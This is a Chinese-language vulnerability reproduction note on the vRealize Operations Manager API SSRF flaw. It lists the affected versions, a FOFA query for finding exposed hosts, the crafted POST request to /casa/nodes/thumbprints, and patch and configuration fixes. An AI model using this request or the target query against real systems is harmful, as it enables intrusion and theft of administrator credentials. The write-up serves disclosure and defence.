漏洞简介
vRealize Operations Manager是vmware官方提供的针对vmware虚拟化平台的一套运营管理解决方案,通过它可以看到整个虚拟化环境的整体运行情况,潜在风险,以及优化建议等,同时可以提供一些虚拟化运行配置、容量、优化建议等等报告。vRealize Operations Manager 提供跨物理、虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性。使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效率。利用从系统资源(对象)中收集的数据,vRealize Operations Manager 通常能够在客户注意到问题之前识别任何受监控系统组件中的问题。vRealize Operations Manager还经常会向您建议可用来立即修复问题的纠正措施。
vRealize Operations Manager API中存在一个服务器端请求伪造漏洞,其CVSS评分为8.6。具有vRealize Operations Manager API网络访问权限攻击者可以通过利用此漏洞执行服务器端请求伪造攻击,以窃取管理员凭据。
影响版本
VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
VMware Cloud Foundation 4.x、3.x
vRealize Suite Lifecycle Manager 8.x
漏洞复现
fofa语法:
title=“vRealize Operations Manager”
抓包
修改请求
POST /casa/nodes/thumbprints HTTP/1.1
Host: x.x.x.x
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Length: 19
["www.baidu.com"]
一定要修改对请求包要不出现401,415等
ceye的记录
Windows下安装NetCat
官网下载地址
https://eternallybored.org/misc/netcat/
解压到某目录
暂未拿到shell
修复建议
1.官方提供的固件补丁,可访问进行下载
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
2.从casa-security-context.xml 中删除配置行 。
1)通过 SSH 或控制台以 root 身份登录主节点,在控制台中按 ALT+F1 进行登录。
2)在文本编辑器中打开/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml。
3)找到并删除以下行:
<sec:http pattern="/nodes/thumbprints" security=‘none’/>
4)保存并关闭文件。
5)重启 CaSA 服务:
服务 vmware-casa 重启
6)在 vRealize Operations 群集中的所有其他节点上重复步骤 1-5。